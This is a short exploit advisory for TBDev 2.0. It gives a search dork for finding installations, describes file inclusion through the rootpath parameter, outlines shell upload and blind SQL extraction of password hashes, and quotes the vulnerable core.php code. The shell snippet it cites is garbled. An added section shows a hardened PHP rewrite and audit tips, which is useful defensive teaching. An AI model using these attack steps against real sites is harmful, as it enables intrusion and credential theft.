=======================================
TBDev2 Blind SQL Inj3ct0r + RFI Exploit
=======================================

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com

product: TBDev
version: 2.0
site: tbdev.net
Dork: "Powered by TBDev v2.0"

LFI/RFI in the admin panel via the parameter admincp.php?rootpath=

If register_globals is ON, the LFI/RFI is also available outside the admin area, from index.php, through the same parameter.

Read the comments in the exploit. To upload the shell, you need to put the code : "); ?> in a file that is readable on your server and set the path to it in the variable $uploader.

The same exploit can also simply pull the hash and the salt without uploading a shell.

It uses binary search, so relatively few queries are sent for the blind injection (a maximum of 4 requests per character, instead of up to 16 with an exhaustive search, i.e. it works at least 4 times faster than exhaustive search. In general, all exploits for blind SQL injection, whether they use BENCHMARK or brute-force table names, should use the binary search algorithm or something faster).

In the 'admin' directory I also found this file (core.php), which reads:

    $op = (!isset($_REQUEST['op'])) ? "Main" : $_REQUEST['op'];
    foreach ($_GET as $key => $value) $GLOBALS[$key] = $value;
    foreach ($_POST as $key => $value) $GLOBALS[$key] = $value;
    foreach ($_COOKIE as $key => $value) $GLOBALS[$key] = $value;

This file is included in admin.php.
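The core.php loop quoted above, set beside a hardened form, as an added example that is not TBDev code and not part of the original advisory. APP_ROOT, ALLOWED_OPS, the modules/ layout and the request values are assumptions made up for the illustration.

```php
<?php
// Added illustration, not TBDev source. Paths, op names and request
// values below are constructed for the demo.

// The core.php pattern: every request key becomes a variable, which
// recreates register_globals (removed from PHP itself in 5.4).
// $scope stands in for $GLOBALS so the demo cannot clobber real state.
function import_request_unsafe(array $request, array &$scope): void
{
    foreach ($request as $key => $value) {
        $scope[$key] = $value;
    }
}

// Hardened replacement: the base path is a constant, which no request
// can reassign, and 'op' is accepted only if it is on an allowlist.
const APP_ROOT = __DIR__;
const ALLOWED_OPS = ['Main', 'Users', 'Settings']; // hypothetical ops

function read_op(array $request): string
{
    $op = $request['op'] ?? 'Main';
    return (is_string($op) && in_array($op, ALLOWED_OPS, true)) ? $op : 'Main';
}

function module_file(string $op): string
{
    // Only allowlisted names reach here, so the path stays under APP_ROOT.
    return APP_ROOT . '/modules/' . $op . '.php'; // hypothetical layout
}

// Constructed request: one expected key, one key naming an internal variable.
$request = ['op' => 'Users', 'rootpath' => 'value-from-query-string'];

// Unsafe import: the request value replaces the application's own path.
$scope = ['rootpath' => '/var/www/tbdev/'];
import_request_unsafe($request, $scope);
echo 'unsafe rootpath:   ', $scope['rootpath'], PHP_EOL;

// Hardened flow: 'rootpath' in the request is never read at all.
echo 'safe include path: ', module_file(read_op($request)), PHP_EOL;

// A value that is not on the allowlist falls back to the default op.
echo 'rejected op gives: ', read_op(['op' => '../outside']), PHP_EOL;
```

When auditing a code base for this pattern, search for assignments into $GLOBALS, extract() and import_request_variables() applied to $_GET, $_POST, $_COOKIE or $_REQUEST, then check which of the affected variables reach include or require.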